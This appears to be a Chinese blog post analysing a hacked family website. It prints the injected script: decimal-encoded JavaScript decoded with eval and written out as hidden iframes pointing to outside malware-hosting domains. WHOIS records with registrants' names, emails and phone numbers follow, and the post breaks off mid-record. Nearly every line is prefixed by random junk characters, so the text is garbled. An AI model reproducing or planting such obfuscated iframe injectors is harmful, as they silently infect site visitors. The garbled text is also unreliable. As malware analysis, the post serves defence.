首发在我的博客里面,
6&$z!60 K,?M5n ' http://www.areway.cn/?p=175 !|!:MYn @H1pPr =ni&*& 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
>umcpkp-h n]6xrsE <script>t=’60,105,102,114,97,109,101,
-Ufd+( 32,115,114,99,61,104,116,116,112,58,47,47,
t 0nGZ%` 102,114,101,101,46,117,45,117,117,117,46,99,
L8/o9N1 110,47,101,114,114,111,114,46,104,116,109,
j}#48{ 32,119,105,100,116,104,61,49,48,48,32,104,
3Ki`W!C 101,105,103,104,116,61,48,62,60,47,105,102,
i1\xZ<|0 114,97,109,101,62′;
|Tf}8e t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
Yf7n0Etd, T"dX)~E; <script>t=’60,105,102,114,97,109,101,32,115,
+:mj]`= 114,99,61,104,116,116,112,58,47,47,102,114,
bX=ht^e[ 101,101,46,117,45,117,117,117,46,99,110,47,
eIg '
!8h? 101,114,114,111,114,46,104,116,109,32,119,
!+JSg uy 105,100,116,104,61,49,48,48,32,104,101,105,
%* vYX0W" 103,104,116,61,48,62,60,47,105,102,114,97,
c^Rz?2x 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
^md7ezXL document.write(t);</script>
@X\Sh>H
P\*-n" <html xmlns=”
\*v}IO>2}) http://www.w3.org/1999/xhtml S2;{)"mS “>
,BOB &u <head>
CZxQz
<!– Published By Newasp.cc 2007-12-7-18:03:23 –>
J0C<Qb[ <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
}\OLBg/ <title>首页 - 爱生活家庭网
+mMn1& e7>)Z 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
4Y Xtl+G 转换字符串后的大概内容是(谁点击后果自付):
xJJlV P <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
y? )v-YGu mQ('X~l 查询玉米u-uuu.cn的详细信息:
t`Mm Domain Name: u-uuu.cn
TB*g$* ROID: 20070901s10001s64972306-cn
)PB&w%J Domain Status: ok
{KdC51"Nv Registrant Organization: 王雷
QE=Cum
Registrant Name: 王雷
*{)[:; Administrative Email:
czlovexs@126.com E)NH6~ Sponsoring Registrar: 北京万网志成科技有限公司
/n/U)!tp Name Server:ns.yovole.com
W6E9
Name Server:ns1.yovole.com
f(|qE( Registration Date: 2007-09-01 17:54
0{gvd"q Expiration Date: 2008-09-01 17:54
MS_&;2 最后PING了一下地址 都没有什么….
X+?*Tw!\ B#B$w_z 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
F,%qG, <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
zTAt% w5 <script language=”javascript” src=”
`a3q)}*Y http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script %*oz~,i >
F2AM/m^!q 这个玉米应该有可能是木马作者的:
{ylc2 1 foafau.info的详细信息:
Iwize,J~X Access to INFO WHOIS information is provided to assist persons in
9K Ih}Q@P determining the contents of a domain name registration record in the
pvDr&n9 Afilias registry database. The data in this record is provided by
HJ !)D~M{ Afilias Limited for informational purposes only, and Afilias does not
zVGjXuNa guarantee its accuracy. This service is intended only for query-based
42Tjbten_u access. You agree that you will use this data only for lawful purposes
]Qkto4DQ5 and that, under no circumstances will you use this data to: (a) allow,
!5?#^q enable, or otherwise support the transmission by e-mail, telephone, or
nyw, Fu facsimile of mass unsolicited, commercial advertising or solicitations
Zo-E0[9 to entities other than the data recipient’s own existing customers; or
^.nvX{H8~= (b) enable high volume, automated, electronic processes that send
7$8z}2 queries or data to the systems of Registry Operator, a Registrar, or
i"F'n0*L Afilias except as reasonably necessary to register domain names or
+r2E5s modify existing registrations. All rights reserved. Afilias reserves
f8lB xK the right to modify these terms at any time. By submitting this query,
NQ'^z you agree to abide by this policy.
B5 C]4 Domain ID:D22418703-LRMS
% 95:yyH 0 Domain Name:FOAFAU.INFO
3wX{U8mrg Created On:20-Nov-2007 16:05:42 UTC
=yz#L@\! Last Updated On:20-Nov-2007 16:05:44 UTC
!jU<(eY Expiration Date:20-Nov-2008 16:05:42 UTC
(W5E\hjJ Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
5#80`/w^U Status:CLIENT DELETE PROHIBITED
jMzHs*: Status:CLIENT RENEW PROHIBITED
gK-: t Status:CLIENT TRANSFER PROHIBITED
/21d%T:} Status:CLIENT UPDATE PROHIBITED
5l=B,%s Status:TRANSFER PROHIBITED
9RE{,mos2v Registrant ID:GODA-040110615
"SNsOf Registrant Name:liu hong
HvKueTQ Registrant Organization:
XG<^j}H{} Registrant Street1:beijing
HdJLD+k/ Registrant Street2:
i74^J +xk Registrant Street3:
wTf0O@``6H Registrant City:beijing
$Y,,e3R3 Registrant State/Province:
@1*lmFq'kV Registrant Postal Code:100000
P>)-uLc~W Registrant Country:CN
_ZzN}!Mye Registrant Phone:+86.860108888777
,au64sH Registrant Phone Ext.:
N>/*)Frt Registrant FAX:
p87s99 Registrant FAX Ext.:
T
2x~fiM Registrant Email:bbbshiji@163.com
eG"iJ%I Admin ID:GODA-240110615
%,K |v Admin Name:liu hong
V~Tjz%< Admin Organization:
>-s}1*^=oD Admin Street1:beijing
j+Y4>fL$ Admin Street2:
G qk"%irZ Admin Street3:
6x]|IWvW Admin City:beijing
?uU0NKZA Admin State/Province:
\S=!la_T@m Admin Postal Code:100000
Pl}}!<!<z Admin Country:CN
mIFS/C Admin Phone:+86.860108888777
7v?tSob:b Admin Phone Ext.:
,H1J$=X' Admin FAX:
i>ORCOOU Admin FAX Ext.:
UciWrwE Admin Email:bbbshiji@163.com
CV]PCq! Billing ID:GODA-340110615
>:W)9o Billing Name:liu hong
8kW9.
Billing Organization:
@tEVgyN Billing Street1:beijing
E;VB oN [ Billing Street2:
vEtogkFA" Billing Street3:
qt^%jIv Billing City:beijing
|GdA0y\v*} Billing State/Province:
+A~lPXAXW Billing Postal Code:100000
Q,#M
0 Billing Country:CN
'x+0
yd Billing Phone:+86.860108888777
Pu/0<